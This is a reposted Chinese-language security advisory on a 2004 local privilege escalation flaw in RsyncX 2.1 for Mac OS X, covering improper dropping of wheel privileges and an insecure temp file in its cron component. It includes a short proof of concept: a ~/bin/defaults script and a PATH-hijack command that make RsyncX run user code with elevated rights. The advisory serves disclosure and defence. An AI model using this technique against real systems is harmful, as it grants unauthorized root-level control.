RsyncX本地权限提升漏洞

2008-04-11 09:35:49来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

RsyncX本地权限提升漏洞

发布日期:2004-09-17
更新日期:2004-09-20

受影响系统:
RsyncX RsyncX 2.1
描述:
BUGTRAQ ID: 11211

RsyncX是一款通过命令行和图形用户界面实现HFS 支持和配置的rsync实现。

RsyncX实现没有正确丢弃wheel权限,本地攻击者可以利用这个漏洞获得root用户权限。

RsyncX不正确丢弃'wheel'组权限,允许本地用户以wheel组权限执行任意程序。本地攻击者可以在用户路径中建立特殊的'defaults'文件,使得其内容以高特权属性执行。

另外定时组件不安全的使用临时文件('/tmp/cron_rsyncxtmp'),本地用户可以在文件系统中建立符号文件,控制'/etc/crontab'导致权限提升。

<*来源:Matt Johnston (matt@ucc.asn.au)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109543708829034&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

建立如下内容的~/bin/defaults文件:

=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

然后在用户路径的~/bin中运行RsyncX :

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

建议:
厂商补丁:

RsyncX
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.macosxlabs.org/rsyncx/rsyncx.html

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:GNU Radius SNMP字符串长度整数溢出拒绝服务漏洞

下一篇:Google工具栏